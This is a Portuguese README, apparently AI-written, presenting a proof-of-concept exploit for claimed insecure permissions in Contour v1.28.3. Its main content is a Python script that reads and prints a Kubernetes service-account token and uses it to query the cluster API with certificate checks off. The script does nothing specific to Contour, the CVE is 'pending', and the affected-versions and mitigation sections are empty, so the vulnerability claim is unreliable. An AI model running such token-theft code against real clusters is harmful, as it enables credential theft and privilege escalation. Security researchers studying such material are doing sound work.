
Exploit PoC para permissões inseguras no Contour v1.28.3 que recupera um token de conta de serviço Kubernetes e acessa a API do cluster, demonstrando escalonamento de privilégios.
Aqui está um README.md para uma Prova de Conceito (PoC) demonstrando a vulnerabilidade de permissões inseguras no Contour v1.28.3:
Este repositório contém um script de Prova de Conceito (PoC) demonstrando uma vulnerabilidade de permissões inseguras no Contour v1.28.3. Esta vulnerabilidade permite que atacantes acessem dados sensíveis e escalem privilégios ao obter o token da conta de serviço.
CVE-ID: (Pendente)
Visão Geral: O Contour v1.28.3 contém permissões inseguras que permitem que atacantes acessem o token da conta de serviço. Ao explorar esta vulnerabilidade, um atacante pode obter o token da conta de serviço, que pode ser usado para acessar dados sensíveis e potencialmente escalar privilégios dentro do cluster Kubernetes.
Versões Afetadas:
Mitigações:
Este script de PoC demonstra como acessar o token da conta de serviço no Contour v1.28.3. Certifique-se de ter permissão explícita para realizar este teste.
import os
import requests
# Configuration
kubernetes_api_url = "https://kubernetes.default.svc" # Kubernetes API URL
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token" # Path to the service account token
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace" # Path to the namespace
def get_service_account_token():
try:
# Read the service account token
with open(token_path, 'r') as token_file:
token = token_file.read().strip()
print(f"[+] Service Account Token: {token}")
return token
except Exception as e:
print(f"[-] Error reading token: {e}")
return None
def get_namespace():
try:
# Read the namespace
with open(namespace_path, 'r') as namespace_file:
namespace = namespace_file.read().strip()
print(f"[+] Namespace: {namespace}")
return namespace
except Exception as e:
print(f"[-] Error reading namespace: {e}")
return None
def access_kubernetes_api(token, namespace):
try:
# Set the headers with the token
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
# Make a request to the Kubernetes API to get pods in the namespace
response = requests.get(f"{kubernetes_api_url}/api/v1/namespaces/{namespace}/pods", headers=headers, verify=False)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.json())
if response.status_code == 200:
print("[+] Successfully accessed Kubernetes API.")
else:
print("[-] Failed to access Kubernetes API.")
except Exception as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
# Get the service account token and namespace
token = get_service_account_token()
namespace = get_namespace()
if token and namespace:
# Access the Kubernetes API using the token
access_kubernetes_api(token, namespace)
Para lidar com esta vulnerabilidade:
Para mais informações sobre como proteger sua implantação do Contour, consulte a documentação oficial do Contour.
Este README.md fornece uma visão geral da vulnerabilidade, um script de PoC para demonstrar o problema e instruções sobre como mitigar o risco. Certifique-se de lidar com esta PoC de forma responsável e apenas em sistemas onde você tenha autorização explícita.